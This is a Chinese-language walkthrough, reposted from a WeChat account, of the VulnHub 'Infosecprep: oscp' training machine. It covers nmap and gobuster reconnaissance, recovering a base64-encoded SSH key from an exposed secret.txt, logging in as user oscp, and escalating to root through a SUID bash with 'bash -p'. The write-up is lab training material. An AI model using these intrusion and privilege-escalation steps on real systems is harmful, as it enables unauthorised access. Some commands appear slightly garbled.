VulnHub靶机 | Infosecprep:oscp

admin 2023年3月13日06:31:18评论54 views字数 983阅读3分16秒阅读模式

"满地都是六便士,他却抬头看见了月亮"


项目地址:

https://download.vulnhub.com/infosecprep/oscp.zip
本靶机比较适合新手


0x00.主机探测

sudo nmap -sP 192.168.33.1/24

VulnHub靶机 | Infosecprep:oscp

确定目标IP为:192.168.33.131


0x01.端口服务探测:

sudo nmap -sC -sV 192.168.33.131 -oN oscp.nmap

VulnHub靶机 | Infosecprep:oscp


0x02.访问80端口:

一个很经典的WordPress页面当然最重要的信息是only user for the box is “oscp”
这里有两种可能:1.指wordpress后台账户只有oscp,2.是这台靶机系统上只有ROOT和OSCP这两个用户

VulnHub靶机 | Infosecprep:oscp

是一个 WordPress 的 cms ,
#看下是什么版本的cmseek -u http://192.168.33.131

VulnHub靶机 | Infosecprep:oscp


0x03.目录遍历:

sudo gobuster dir -u http://192.168.33.131 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium

VulnHub靶机 | Infosecprep:oscp


VulnHub靶机 | Infosecprep:oscp

http://192.168.33.131/secret.tx

VulnHub靶机 | Infosecprep:oscp

VulnHub靶机 | Infosecprep:oscp


Base64解密:发现是SSH密钥

VulnHub靶机 | Infosecprep:oscp


0x04.直接SSH链接:

ssh -i id_rsa oscp@192.168.33.131

VulnHub靶机 | Infosecprep:oscp


0x05.提权:先拿一个完整的shell

python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm ctrl + z stty -a stty raw -echo;fg reset stty rows x columns y

这个靶机不能使用这个,提权要用到现在通过 python 拿一个完整的 shell 就不行了.

guid =s 提权

find / -perm -u=s -type f 2>/dev/null

VulnHub靶机 | Infosecprep:oscp

VulnHub靶机 | Infosecprep:oscp

/usr/bin/bash -p whoami


0x06.提权成功:

VulnHub靶机 | Infosecprep:oscp



参考资料:

https://blog.csdn.net/qq_44635376/article/details/113679933
https://www.cnblogs.com/takagisan/p/16253546.html


原文始发于微信公众号(0x00实验室):VulnHub靶机 | Infosecprep:oscp

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月13日06:31:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VulnHub靶机 | Infosecprep:oscphttps://cn-sec.com/archives/1231755.html

发表评论

匿名网友 填写信息